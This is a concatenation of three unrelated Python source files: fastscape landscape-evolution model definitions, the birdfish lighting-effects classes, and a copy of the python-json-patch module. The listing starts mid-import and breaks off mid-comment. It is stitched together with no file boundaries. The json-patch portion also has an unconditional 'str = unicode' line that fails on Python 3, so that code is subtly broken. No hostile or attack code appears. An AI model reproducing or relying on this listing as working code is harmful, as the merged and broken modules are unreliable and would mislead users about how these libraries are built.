UniformSedimentLayer)
from ..processes.marine import MarineSedimentTransport, Sea
from ..processes.tectonics import (BlockUplift,
SurfaceAfterTectonics,
TectonicForcing,
TwoBlocksUplift)
# ``bootstrap_model`` has the minimal set of processes required to
# simulate on a 2D uniform grid the evolution of topographic surface
# under the action of tectonic and erosion processes. No such
# processes are included here, however. It only provides the "skeleton" of a
# landscape evolution model and might be used as a basis to create
# custom models.
bootstrap_model = xs.Model({
'grid': RasterGrid2D,
'fs_context': FastscapelibContext,
'boundary': BorderBoundary,
'tectonics': TectonicForcing,
'surf2erode': SurfaceToErode,
'erosion': TotalErosion,
'vmotion': TotalVerticalMotion,
'topography': SurfaceTopography,
})
# ``basic_model`` is a "standard" landscape evolution model that
# includes block uplift, (bedrock) channel erosion using the stream
# power law and hillslope erosion/deposition using linear
# diffusion. Initial topography is a flat surface with random
# perturbations. Flow is routed on the topographic surface using a D8,
# single flow direction algorithm. All erosion processes are computed
# on a topographic surface that is first updated by tectonic forcing
# processes.
basic_model = bootstrap_model.update_processes({
'uplift': BlockUplift,
'surf2erode': SurfaceAfterTectonics,
'flow': SingleFlowRouter,
'drainage': DrainageArea,
'spl': StreamPowerChannel,
'diffusion': LinearDiffusion,
'terrain': TerrainDerivatives,
'init_topography': FlatSurface,
'init_erosion': NoErosionHistory
})
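# Illustrative usage sketch (not part of this module): a model such as
# ``basic_model`` is typically driven through ``xs.create_setup``. The input
# variable names below ('grid__shape', 'uplift__rate', 'spl__k_coef', ...) are
# assumptions based on the process names above and the fastscape docs --
# inspect ``basic_model.input_vars`` for the authoritative list.
#
#     import numpy as np
#     in_ds = xs.create_setup(
#         model=basic_model,
#         clocks={'time': np.linspace(0., 1e6, 101)},
#         input_vars={
#             'grid__shape': [101, 101],
#             'grid__length': [1e4, 1e4],
#             'boundary__status': 'fixed_value',
#             'uplift__rate': 1e-3,
#             'spl__k_coef': 1e-4,
#             'diffusion__diffusivity': 1e-1,
#             # ... plus any remaining required inputs
#         },
#         output_vars={'topography__elevation': 'time'},
#     )
#     out_ds = in_ds.xsimlab.run(model=basic_model)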
# ``sediment_model`` is built on top of ``basic_model`` ; it tracks
# the evolution of both the topographic surface and the bedrock,
# separated by a uniform, active layer of sediment. This model uses an
# extended version of the stream-power law that also includes channel
# transport and deposition. Flow is routed using a multiple flow
# direction algorithm. Differential erosion/deposition is enabled for
# both hillslope and channel processes, i.e., distinct values may be
# set for the erosion and transport coefficients (bedrock vs
# soil/sediment).
sediment_model = basic_model.update_processes({
'bedrock': Bedrock,
'active_layer': UniformSedimentLayer,
'init_bedrock': BareRockSurface,
'flow': MultipleFlowRouter,
'spl': DifferentialStreamPowerChannelTD,
'diffusion': DifferentialLinearDiffusion
})
# ``marine_model`` simulates the erosion, transport and deposition of
# bedrock or sediment in both continental and submarine
# environments. It is built on top of ``sediment_model`` to which it
# adds a process for sediment transport, deposition and compaction in
# the submarine domain (under sea level). The processes for the
# initial topography and uplift both allow easy set-up of the two land
# vs. marine environments. An additional process keeps track of a
# fixed number of stratigraphic horizons over time.
marine_model = sediment_model.update_processes({
'init_topography': Escarpment,
'uplift': TwoBlocksUplift,
'sea': Sea,
'marine': MarineSedimentTransport,
'strati': StratigraphicHorizons
})
"""
Effects classes.
Effects are added to the show directly because they track themselves over time.
Each effect has one or more targets that it can apply the effect to in unison,
changing some attribute over time - generally using envelopes.
"""
import random
from birdfish.envelope import (Envelope, EnvelopeSegment,
ColorEnvelope)
from birdfish.lights import BaseLightElement, LightElement
from birdfish import tween
# TODO There should probably be a base element - then BaseData or BaseLight
# element
class BaseEffect(BaseLightElement):
def __init__(self, *args, **kwargs):
super(BaseEffect, self).__init__(*args, **kwargs)
self.targets = kwargs.get('targets', [])
        # TODO should triggered default be T or F?
triggered = kwargs.get('triggered', True)
if triggered:
self.trigger_state = 0
else:
self.trigger_state = 1
self.envelope_filters = []
def filter_targets(self, targets):
"""
subclasses can override to provide some behavior that limits
the effect only to some targets, or targets in some state
"""
        # TODO may need to rethink this to make it easier to add filters
        # and/or reuse this adsr stuff
if targets and self.envelope_filters:
filtered_targets = []
for target in targets:
if hasattr(target, 'adsr_envelope'):
label = target.adsr_envelope.get_current_segment().label
if label in self.envelope_filters:
filtered_targets.append(target)
return filtered_targets
else:
return targets
def get_targets(self, targets):
if not targets:
targets = self.targets
elif isinstance(targets, LightElement):
targets = [targets]
# set self.targets for use by _off_trigger or other
# methods outside the update call
self.targets = self.filter_targets(targets)
return self.targets
def trigger(self, intensity, **kwargs):
if intensity:
self.trigger_state = 1
self._on_trigger(intensity, **kwargs)
else:
self.trigger_state = 0
self._off_trigger(intensity, **kwargs)
def _off_trigger(self, intensity, **kwargs):
# Since effects can act on lights during release - after off-trigger
# they may be responsible for turning element intensity off
super(BaseEffect, self)._off_trigger()
for element in self.targets:
element.set_intensity(0)
def update(self, show, targets=None):
raise NotImplementedError
class EnvelopeMap(BaseEffect, Envelope):
def __init__(self, attr, *args, **kwargs):
BaseEffect.__init__(self, *args, **kwargs)
Envelope.__init__(self, *args, **kwargs)
self.attr = attr
def _off_trigger(self, intensity, **kwargs):
self.reset()
def update(self, show, targets=None):
if self.trigger_state:
targets = self.get_targets(targets)
if self.last_update != show.timecode:
val = Envelope.update(self, show.time_delta)
self.last_update = show.timecode
for target in targets:
setattr(target, self.attr, val)
class ColorShift(BaseEffect, ColorEnvelope):
# TODO notes:
# how does it handle the existing color of an element
# can I handle explicit start color, or take current color and shift both
# can we reset the color to the original?
#
def __init__(self, shift_amount=0, target=0, **kwargs):
super(ColorShift, self).__init__(**kwargs)
ColorEnvelope.__init__(self, **kwargs)
self.hue = 0
self.saturation = 0
self.intensity = 1
def _on_trigger(self, intensity, **kwargs):
self.reset()
def update(self, show, targets=None):
if self.trigger_state:
targets = self.get_targets(targets)
# TODO need to make this anti duplicate calling logic
# more effects generic - maybe effects specific stuff goes
# in a render method
if self.last_update != show.timecode:
self.hue, self.saturation, self.intensity = self._color_update(
show.time_delta)
self.last_update = show.timecode
for target in targets:
if self.hue is not None:
target.hue = self.hue
if self.saturation is not None:
target.saturation = self.saturation
if self.intensity is not None:
target.set_intensity(self.intensity)
class Twinkle(BaseEffect):
def __init__(self, frequency=2, **kwargs):
super(Twinkle, self).__init__(**kwargs)
self.on_min = .01
self.on_max = 1
self.off_min = .8
self.off_max = 1.3
self.intensity_min = .3
self.intensity_max = 1
self.blinkon = True
self.cycle_elapsed = 0
self.last_changed = None
# self.mode = 'darken'
self.mode = 'modes-disabled'
self.use_trigger = kwargs.get('use_trigger', True)
# the parameters of current cycle
self.on_dur = self.off_dur = self.intensity = 0
self.durations = {True: self.on_dur, False: self.off_dur}
def setup_cycle(self):
self.on_dur = self.on_min + random.random() * (self.on_max
- self.on_min)
self.off_dur = self.off_min + random.random() * (self.off_max
- self.off_min)
self.intensity = self.intensity_min + random.random() * (
self.intensity_max - self.intensity_min)
self.durations = {True: self.on_dur, False: self.off_dur}
def update(self, show, targets=None):
        # note: a twinkle cannot simply be assigned to an element's effects
        # array - it must be added to the show directly, since it uses the
        # trigger method of its targets. This is true of any effect that uses
        # the elements' trigger method to render the effect - an effect cannot
        # be piggy-backed on an element's trigger if it also uses trigger to
        # cause/manage the effect. Perhaps an effect should always manipulate
        # the lower level attributes instead of using a trigger.
# self.trigger_state = 1
if self.trigger_state:
targets = self.get_targets(targets)
self.cycle_elapsed += show.time_delta
if self.cycle_elapsed > self.durations[self.blinkon]:
# current cycle complete
if self.blinkon:
# trigger off targets
if self.use_trigger:
[t.trigger(0) for t in targets]
else:
[t.set_intensity(0) for t in targets]
self.setup_cycle()
else:
for t in targets:
if self.mode == 'darken':
value = min(t.intensity, self.intensity)
elif self.mode == 'lighten':
value = max(t.intensity, self.intensity)
else:
# modes currently disabled
value = self.intensity
if self.use_trigger:
t.trigger(value)
else:
t.set_intensity(value)
self.blinkon = not self.blinkon
self.cycle_elapsed = 0
    def _off_trigger(self, intensity=0, **kwargs):
        # only works for explicit effect targets
        # (BaseEffect.trigger passes the intensity through, so accept it here)
        if self.use_trigger:
            [t.trigger(0) for t in self.targets]
        else:
            [t.set_intensity(0) for t in self.targets]
        self.trigger_state = 1
class Blink(BaseEffect):
def __init__(self, frequency=2, **kwargs):
super(Blink, self).__init__(**kwargs)
self._frequency = frequency
self.blinkon = True
self.last_changed = None
self._set_frequency(self._frequency)
def update(self, show, targets=None):
targets = self.get_targets(targets)
if not self.last_changed:
self.last_changed = show.timecode
return
if show.timecode - self.last_changed > self.period_duration:
self.blinkon = not self.blinkon
self.last_changed = show.timecode
if not self.blinkon:
# we only modify intensity when off
for target in targets:
target.set_intensity(0)
def _get_frequency(self):
return self._frequency
def _set_frequency(self, frequency):
self._frequency = frequency
self.period_duration = 1.0 / (2 * self._frequency)
frequency = property(_get_frequency, _set_frequency)
class Pulser(BaseEffect):
# TODO need to implement trigger here - otherwise effects will run
# "in the background" all the time,and may not be synced to
# elements as desired.
#
def __init__(self, frequency=1, on_shape=tween.LINEAR,
off_shape=tween.LINEAR, **kwargs):
super(Pulser, self).__init__(**kwargs)
period_duration = 1.0 / (2 * frequency)
on_flash = EnvelopeSegment(start=0, change=1, tween=on_shape,
duration=period_duration)
off_flash = EnvelopeSegment(start=1, change=-1, tween=off_shape,
duration=period_duration)
self.envelope = Envelope(loop=-1)
self.envelope.segments = [on_flash, off_flash]
def update(self, show, targets=None):
if self.trigger_state:
targets = self.get_targets(targets)
val = self.envelope.update(show.time_delta)
for target in targets:
target.set_intensity(val * target.intensity)
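# Illustrative wiring sketch (the Show / frame-loop objects live elsewhere in
# birdfish and are assumptions here): effects are usually given explicit
# targets and are then updated once per frame by the show, e.g.
#
#     pulse = Pulser(frequency=2, targets=[some_element], triggered=False)
#     # ... inside the frame loop:
#     pulse.update(show)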
# -*- coding: utf-8 -*-
#
# python-json-patch - An implementation of the JSON Patch format
# https://github.com/stefankoegl/python-json-patch
#
# Copyright (c) 2011 Stefan Kögl <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
""" Apply JSON-Patches (RFC 6902) """
from __future__ import unicode_literals
import collections
import copy
import functools
import json
import sys
from jsonpointer import JsonPointer, JsonPointerException
_ST_ADD = 0
_ST_REMOVE = 1
try:
from collections.abc import MutableMapping, MutableSequence
except ImportError:
from collections import MutableMapping, MutableSequence
str = unicode
# Will be parsed by setup.py to determine package metadata
__author__ = 'Stefan Kögl <[email protected]>'
__version__ = '1.24'
__website__ = 'https://github.com/stefankoegl/python-json-patch'
__license__ = 'Modified BSD License'
# pylint: disable=E0611,W0404
if sys.version_info >= (3, 0):
basestring = (bytes, str) # pylint: disable=C0103,W0622
class JsonPatchException(Exception):
"""Base Json Patch exception"""
class InvalidJsonPatch(JsonPatchException):
""" Raised if an invalid JSON Patch is created """
class JsonPatchConflict(JsonPatchException):
"""Raised if patch could not be applied due to conflict situation such as:
- attempt to add object key when it already exists;
    - attempt to operate with nonexistent object key;
- attempt to insert value to array at position beyond its size;
- etc.
"""
class JsonPatchTestFailed(JsonPatchException, AssertionError):
""" A Test operation failed """
def multidict(ordered_pairs):
"""Convert duplicate keys values to lists."""
# read all values into lists
mdict = collections.defaultdict(list)
for key, value in ordered_pairs:
mdict[key].append(value)
return dict(
# unpack lists that have only 1 item
(key, values[0] if len(values) == 1 else values)
for key, values in mdict.items()
)
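# For example, multidict([('a', 1), ('a', 2), ('b', 3)]) returns
# {'a': [1, 2], 'b': 3}: duplicated keys are collected into a list while
# unique keys keep their single value.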
# The "object_pairs_hook" parameter is used to handle duplicate keys when
# loading a JSON object.
_jsonloads = functools.partial(json.loads, object_pairs_hook=multidict)
def apply_patch(doc, patch, in_place=False):
"""Apply list of patches to specified json document.
:param doc: Document object.
:type doc: dict
:param patch: JSON patch as list of dicts or raw JSON-encoded string.
:type patch: list or str
:param in_place: While :const:`True` patch will modify target document.
By default patch will be applied to document copy.
:type in_place: bool
:return: Patched document object.
:rtype: dict
>>> doc = {'foo': 'bar'}
>>> patch = [{'op': 'add', 'path': '/baz', 'value': 'qux'}]
>>> other = apply_patch(doc, patch)
>>> doc is not other
True
>>> other == {'foo': 'bar', 'baz': 'qux'}
True
>>> patch = [{'op': 'add', 'path': '/baz', 'value': 'qux'}]
>>> apply_patch(doc, patch, in_place=True) == {'foo': 'bar', 'baz': 'qux'}
True
>>> doc == other
True
"""
if isinstance(patch, basestring):
patch = JsonPatch.from_string(patch)
else:
patch = JsonPatch(patch)
return patch.apply(doc, in_place)
def make_patch(src, dst):
"""Generates patch by comparing two document objects. Actually is
a proxy to :meth:`JsonPatch.from_diff` method.
:param src: Data source document object.
:type src: dict
    :param dst: Data destination document object.
:type dst: dict
>>> src = {'foo': 'bar', 'numbers': [1, 3, 4, 8]}
>>> dst = {'baz': 'qux', 'numbers': [1, 4, 7]}
>>> patch = make_patch(src, dst)
>>> new = patch.apply(src)
>>> new == dst
True
"""
return JsonPatch.from_diff(src, dst)
class JsonPatch(object):
"""A JSON Patch is a list of Patch Operations.
>>> patch = JsonPatch([
... {'op': 'add', 'path': '/foo', 'value': 'bar'},
... {'op': 'add', 'path': '/baz', 'value': [1, 2, 3]},
... {'op': 'remove', 'path': '/baz/1'},
... {'op': 'test', 'path': '/baz', 'value': [1, 3]},
... {'op': 'replace', 'path': '/baz/0', 'value': 42},
... {'op': 'remove', 'path': '/baz/1'},
... ])
>>> doc = {}
>>> result = patch.apply(doc)
>>> expected = {'foo': 'bar', 'baz': [42]}
>>> result == expected
True
    A JsonPatch object is iterable, so you can easily access each patch
    statement in a loop:
>>> lpatch = list(patch)
>>> expected = {'op': 'add', 'path': '/foo', 'value': 'bar'}
>>> lpatch[0] == expected
True
>>> lpatch == patch.patch
True
    A JsonPatch can also be converted directly to :class:`bool`; it is truthy
    only if it contains any operation statements:
>>> bool(patch)
True
>>> bool(JsonPatch([]))
False
This behavior is very handy with :func:`make_patch` to write more readable
code:
>>> old = {'foo': 'bar', 'numbers': [1, 3, 4, 8]}
>>> new = {'baz': 'qux', 'numbers': [1, 4, 7]}
>>> patch = make_patch(old, new)
>>> if patch:
    ...     # document has changed, do something useful
... patch.apply(old) #doctest: +ELLIPSIS
{...}
"""
def __init__(self, patch):
self.patch = patch
self.operations = {
'remove': RemoveOperation,
'add': AddOperation,
'replace': ReplaceOperation,
'move': MoveOperation,
'test': TestOperation,
'copy': CopyOperation,
}
def __str__(self):
"""str(self) -> self.to_string()"""
return self.to_string()
def __bool__(self):
return bool(self.patch)
__nonzero__ = __bool__
def __iter__(self):
return iter(self.patch)
def __hash__(self):
return hash(tuple(self._ops))
def __eq__(self, other):
if not isinstance(other, JsonPatch):
return False
return self._ops == other._ops
def __ne__(self, other):
return not(self == other)
@classmethod
def from_string(cls, patch_str):
"""Creates JsonPatch instance from string source.
:param patch_str: JSON patch as raw string.
:type patch_str: str
:return: :class:`JsonPatch` instance.
"""
patch = _jsonloads(patch_str)
return cls(patch)
@classmethod
def from_diff(cls, src, dst, optimization=True):
"""Creates JsonPatch instance based on comparison of two document
objects. Json patch would be created for `src` argument against `dst`
one.
:param src: Data source document object.
:type src: dict
:param dst: Data source document object.
:type dst: dict
:return: :class:`JsonPatch` instance.
>>> src = {'foo': 'bar', 'numbers': [1, 3, 4, 8]}
>>> dst = {'baz': 'qux', 'numbers': [1, 4, 7]}
>>> patch = JsonPatch.from_diff(src, dst)
>>> new = patch.apply(src)
>>> new == dst
True
"""
builder = DiffBuilder()
builder._compare_values('', None, src, dst)
ops = list(builder.execute())
return cls(ops)
def to_string(self):
"""Returns patch set as JSON string."""
return json.dumps(self.patch)
@property
def _ops(self):
return tuple(map(self._get_operation, self.patch))
def apply(self, obj, in_place=False):
"""Applies the patch to a given object.
:param obj: Document object.
:type obj: dict
        :param in_place: When :const:`True`, the patch is applied directly to
            `obj`; otherwise it is applied to a copy of `obj`.
:type in_place: bool
:return: Modified `obj`.
"""
if not in_place:
obj = copy.deepcopy(obj)
for operation in self._ops:
obj = operation.apply(obj)
return obj
def _get_operation(self, operation):
if 'op' not in operation:
raise InvalidJsonPatch("Operation does not contain 'op' member")
op = operation['op']
if not isinstance(op, basestring):
raise InvalidJsonPatch("Operation must be a string")
if op not in self.operations:
raise InvalidJsonPatch("Unknown operation {0!r}".format(op))
cls = self.operations[op]
return cls(operation)
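# Example: building a patch from a raw JSON string and applying it with and
# without ``in_place``. Illustrative sketch only; document and operations are
# arbitrary sample data:
#
#   >>> patch = JsonPatch.from_string('[{"op": "add", "path": "/baz", "value": "qux"}]')
#   >>> doc = {'foo': 'bar'}
#   >>> patch.apply(doc) == {'foo': 'bar', 'baz': 'qux'}   # returns a modified copy
#   True
#   >>> doc == {'foo': 'bar'}                              # original left untouched
#   True
#   >>> patch.apply(doc, in_place=True) is doc             # in_place modifies doc itself
#   True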
class PatchOperation(object):
"""A single operation inside a JSON Patch."""
def __init__(self, operation):
        if 'path' not in operation:
raise InvalidJsonPatch("Operation must have a 'path' member")
if isinstance(operation['path'], JsonPointer):
self.location = operation['path'].path
self.pointer = operation['path']
else:
self.location = operation['path']
try:
self.pointer = JsonPointer(self.location)
except TypeError as ex:
raise InvalidJsonPatch("Invalid 'path'")
self.operation = operation
def apply(self, obj):
"""Abstract method that applies a patch operation to the specified object."""
raise NotImplementedError('should implement the patch operation.')
def __hash__(self):
return hash(frozenset(self.operation.items()))
def __eq__(self, other):
if not isinstance(other, PatchOperation):
return False
return self.operation == other.operation
def __ne__(self, other):
return not(self == other)
@property
def path(self):
return '/'.join(self.pointer.parts[:-1])
@property
def key(self):
try:
return int(self.pointer.parts[-1])
except ValueError:
return self.pointer.parts[-1]
@key.setter
def key(self, value):
self.pointer.parts[-1] = str(value)
self.location = self.pointer.path
self.operation['path'] = self.location
class RemoveOperation(PatchOperation):
"""Removes an object property or an array element."""
def apply(self, obj):
subobj, part = self.pointer.to_last(obj)
try:
del subobj[part]
except (KeyError, IndexError) as ex:
msg = "can't remove a non-existent object '{0}'".format(part)
raise JsonPatchConflict(msg)
return obj
def _on_undo_remove(self, path, key):
if self.path == path:
if self.key >= key:
self.key += 1
else:
key -= 1
return key
def _on_undo_add(self, path, key):
if self.path == path:
if self.key > key:
self.key -= 1
else:
key -= 1
return key
class AddOperation(PatchOperation):
"""Adds an object property or an array element."""
def apply(self, obj):
try:
value = self.operation["value"]
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'value' member")
subobj, part = self.pointer.to_last(obj)
if isinstance(subobj, MutableSequence):
if part == '-':
subobj.append(value) # pylint: disable=E1103
elif part > len(subobj) or part < 0:
raise JsonPatchConflict("can't insert outside of list")
else:
subobj.insert(part, value) # pylint: disable=E1103
elif isinstance(subobj, MutableMapping):
if part is None:
obj = value # we're replacing the root
else:
subobj[part] = value
else:
if part is None:
raise TypeError("invalid document type {0}".format(type(subobj)))
else:
raise JsonPatchConflict("unable to fully resolve json pointer {0}, part {1}".format(self.location, part))
return obj
def _on_undo_remove(self, path, key):
if self.path == path:
if self.key > key:
self.key += 1
else:
key += 1
return key
def _on_undo_add(self, path, key):
if self.path == path:
if self.key > key:
self.key -= 1
else:
key += 1
return key
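# Example: for arrays, an 'add' with the special '-' index appends, while a
# numeric index inserts before that position. Sketch with arbitrary data:
#
#   >>> AddOperation({'op': 'add', 'path': '/nums/-', 'value': 4}).apply({'nums': [1, 2, 3]})
#   {'nums': [1, 2, 3, 4]}
#   >>> AddOperation({'op': 'add', 'path': '/nums/0', 'value': 0}).apply({'nums': [1, 2, 3]})
#   {'nums': [0, 1, 2, 3]}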
class ReplaceOperation(PatchOperation):
"""Replaces an object property or an array element by a new value."""
def apply(self, obj):
try:
value = self.operation["value"]
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'value' member")
subobj, part = self.pointer.to_last(obj)
if part is None:
return value
if part == "-":
raise InvalidJsonPatch("'path' with '-' can't be applied to 'replace' operation")
if isinstance(subobj, MutableSequence):
if part >= len(subobj) or part < 0:
raise JsonPatchConflict("can't replace outside of list")
elif isinstance(subobj, MutableMapping):
if part not in subobj:
msg = "can't replace a non-existent object '{0}'".format(part)
raise JsonPatchConflict(msg)
else:
if part is None:
raise TypeError("invalid document type {0}".format(type(subobj)))
else:
raise JsonPatchConflict("unable to fully resolve json pointer {0}, part {1}".format(self.location, part))
subobj[part] = value
return obj
def _on_undo_remove(self, path, key):
return key
def _on_undo_add(self, path, key):
return key
class MoveOperation(PatchOperation):
"""Moves an object property or an array element to a new location."""
def apply(self, obj):
try:
if isinstance(self.operation['from'], JsonPointer):
from_ptr = self.operation['from']
else:
from_ptr = JsonPointer(self.operation['from'])
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'from' member")
subobj, part = from_ptr.to_last(obj)
try:
value = subobj[part]
except (KeyError, IndexError) as ex:
raise JsonPatchConflict(str(ex))
# If source and target are equal, this is a no-op
if self.pointer == from_ptr:
return obj
if isinstance(subobj, MutableMapping) and \
self.pointer.contains(from_ptr):
raise JsonPatchConflict('Cannot move values into their own children')
obj = RemoveOperation({
'op': 'remove',
'path': self.operation['from']
}).apply(obj)
obj = AddOperation({
'op': 'add',
'path': self.location,
'value': value
}).apply(obj)
return obj
@property
def from_path(self):
from_ptr = JsonPointer(self.operation['from'])
return '/'.join(from_ptr.parts[:-1])
@property
def from_key(self):
from_ptr = JsonPointer(self.operation['from'])
try:
return int(from_ptr.parts[-1])
        except (TypeError, ValueError):  # non-numeric parts stay string keys
return from_ptr.parts[-1]
@from_key.setter
def from_key(self, value):
from_ptr = JsonPointer(self.operation['from'])
from_ptr.parts[-1] = str(value)
self.operation['from'] = from_ptr.path
def _on_undo_remove(self, path, key):
if self.from_path == path:
if self.from_key >= key:
self.from_key += 1
else:
key -= 1
if self.path == path:
if self.key > key:
self.key += 1
else:
key += 1
return key
def _on_undo_add(self, path, key):
if self.from_path == path:
if self.from_key > key:
self.from_key -= 1
else:
key -= 1
if self.path == path:
if self.key > key:
self.key -= 1
else:
key += 1
return key
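# Example: 'move' removes the value at 'from' and re-adds it at 'path'; moving
# a value into one of its own children is rejected. Illustrative sketch only:
#
#   >>> MoveOperation({'op': 'move', 'from': '/a', 'path': '/b'}).apply({'a': 1})
#   {'b': 1}
#   >>> MoveOperation({'op': 'move', 'from': '/a', 'path': '/a/child'}).apply({'a': {}})
#   ... raises JsonPatchConflict: Cannot move values into their own children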
class TestOperation(PatchOperation):
"""Test value by specified location."""
def apply(self, obj):
try:
subobj, part = self.pointer.to_last(obj)
if part is None:
val = subobj
else:
val = self.pointer.walk(subobj, part)
except JsonPointerException as ex:
raise JsonPatchTestFailed(str(ex))
try:
value = self.operation['value']
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'value' member")
if val != value:
msg = '{0} ({1}) is not equal to tested value {2} ({3})'
raise JsonPatchTestFailed(msg.format(val, type(val),
value, type(value)))
return obj
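# Example: 'test' leaves the document unchanged and only checks equality; a
# mismatch raises JsonPatchTestFailed. Sketch with arbitrary sample data:
#
#   >>> TestOperation({'op': 'test', 'path': '/foo', 'value': 'bar'}).apply({'foo': 'bar'})
#   {'foo': 'bar'}
#   >>> TestOperation({'op': 'test', 'path': '/foo', 'value': 'baz'}).apply({'foo': 'bar'})
#   ... raises JsonPatchTestFailed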
class CopyOperation(PatchOperation):
""" Copies an object property or an array element to a new location """
def apply(self, obj):
try:
from_ptr = JsonPointer(self.operation['from'])
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'from' member")
subobj, part = from_ptr.to_last(obj)
try:
value = copy.deepcopy(subobj[part])
except (KeyError, IndexError) as ex:
raise JsonPatchConflict(str(ex))
obj = AddOperation({
'op': 'add',
'path': self.location,
'value': value
}).apply(obj)
return obj
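# Example: 'copy' deep-copies the source value, so later changes to the
# original do not leak into the copy. Illustrative sketch only:
#
#   >>> doc = CopyOperation({'op': 'copy', 'from': '/a', 'path': '/b'}).apply({'a': {'x': 1}})
#   >>> doc['a']['x'] = 2
#   >>> doc['b']
#   {'x': 1}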
class DiffBuilder(object):
    """Incrementally builds a JSON patch by comparing two documents,
    collapsing matching remove/add pairs into moves and replaces."""
    def __init__(self):
        # value -> indices of pending add/remove ops (hashable values),
        # with a list-based fallback below for unhashable values
        self.index_storage = [{}, {}]
        self.index_storage2 = [[], []]
        # sentinel of a circular doubly-linked list of [prev, next, op] nodes
        self.__root = root = []
        root[:] = [root, root, None]
def store_index(self, value, index, st):
try:
storage = self.index_storage[st]
stored = storage.get(value)
if stored is None:
storage[value] = [index]
else:
storage[value].append(index)
except TypeError:
self.index_storage2[st].append((value, index))
def take_index(self, value, st):
try:
stored = self.index_storage[st].get(value)
if stored:
return stored.pop()
except TypeError:
storage = self.index_storage2[st]
for i in range(len(storage)-1, -1, -1):
if storage[i][0] == value:
return storage.pop(i)[1]
def insert(self, op):
root = self.__root
last = root[0]
last[1] = root[0] = [last, root, op]
return root[0]
def remove(self, index):
link_prev, link_next, _ = index
link_prev[1] = link_next
link_next[0] = link_prev
index[:] = []
def iter_from(self, start):
root = self.__root
curr = start[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __iter__(self):
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def execute(self):
root = self.__root
curr = root[1]
while curr is not root:
if curr[1] is not root:
op_first, op_second = curr[2], curr[1][2]
if op_first.location == op_second.location and \
type(op_first) == RemoveOperation and \
type(op_second) == AddOperation:
yield ReplaceOperation({
'op': 'replace',
'path': op_second.location,
'value': op_second.operation['value'],
}).operation
curr = curr[1][1]
continue
yield curr[2].operation
curr = curr[1]
def _item_added(self, path, key, item):
index = self.take_index(item, _ST_REMOVE)
if index is not None:
op = index[2]
if type(op.key) == int and type(key) == int:
for v in self.iter_from(index):
op.key = v._on_undo_remove(op.path, op.key)
self.remove(index)
if op.location != _path_join(path, key):
new_op = MoveOperation({
'op': 'move',
'from': op.location,
'path': _path_join(path, key),
})
self.insert(new_op)
else:
new_op = AddOperation({
'op': 'add',
'path': _path_join(path, key),
'value': item,
})
new_index = self.insert(new_op)
self.store_index(item, new_index, _ST_ADD)
def _item_removed(self, path, key, item):
new_op = RemoveOperation({
'op': 'remove',
'path': _path_join(path, key),
})
index = self.take_index(item, _ST_ADD)
new_index = self.insert(new_op)
if index is not None:
op = index[2]
if type(op.key) == int:
for v in self.iter_from(index):
op.key = v._on_undo_add(op.path, op.key)
self.remove(index)
if new_op.location != op.location:
new_op = MoveOperation({
'op': 'move',
'from': new_op.location,
'path': op.location,
})
new_index[2] = new_op
else:
self.remove(new_index)
else:
self.store_index(item, new_index, _ST_REMOVE)
def _item_replaced(self, path, key, item):
self.insert(ReplaceOperation({
'op': 'replace',
'path': _path_join(path, key),
'value': item,
}))
def _compare_dicts(self, path, src, dst):
src_keys = set(src.keys())
dst_keys = set(dst.keys())
added_keys = dst_keys - src_keys
removed_keys = src_keys - dst_keys
for key in removed_keys:
self._item_removed(path, str(key), src[key])
for key in added_keys:
self._item_added(path, str(key), dst[key])
for key in src_keys & dst_keys:
self._compare_values(path, key, src[key], dst[key])
def _compare_lists(self, path, src, dst):
len_src, len_dst = len(src), len(dst)
max_len = max(len_src, len_dst)
min_len = min(len_src, len_dst)
for key in range(max_len):
if key < min_len:
old, new = src[key], dst[key]
if old == new:
continue
elif isinstance(old, MutableMapping) and \
isinstance(new, MutableMapping):
self._compare_dicts(_path_join(path, key), old, new)
elif isinstance(old, MutableSequence) and \
isinstance(new, MutableSequence):
self._compare_lists(_path_join(path, key), old, new)
else:
self._item_removed(path, key, old)
self._item_added(path, key, new)
elif len_src > len_dst:
self._item_removed(path, len_dst, src[key])
else:
self._item_added(path, key, dst[key])
def _compare_values(self, path, key, src, dst):
if isinstance(src, MutableMapping) and \
isinstance(dst, MutableMapping):
self._compare_dicts(_path_join(path, key), src, dst)
elif isinstance(src, MutableSequence) and \
isinstance(dst, MutableSequence):
self._compare_lists(_path_join(path, key), src, dst)
# To ensure we catch changes to JSON, we can't rely on a simple
# src == dst, because it would not recognize the difference between
# 1 and True, among other things. Using json.dumps is the most
# fool-proof way to ensure we catch type changes that matter to JSON
# and ignore those that don't. The performance of this could be
# improved by doing more direct type checks, but we'd need to be
# careful to accept type changes that don't matter when JSONified.
elif json.dumps(src) == json.dumps(dst):
return
else:
self._item_replaced(path, key, dst)
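# Example: the json.dumps comparison above makes the diff type-sensitive in
# JSON terms, so replacing 1 with True is reported even though 1 == True in
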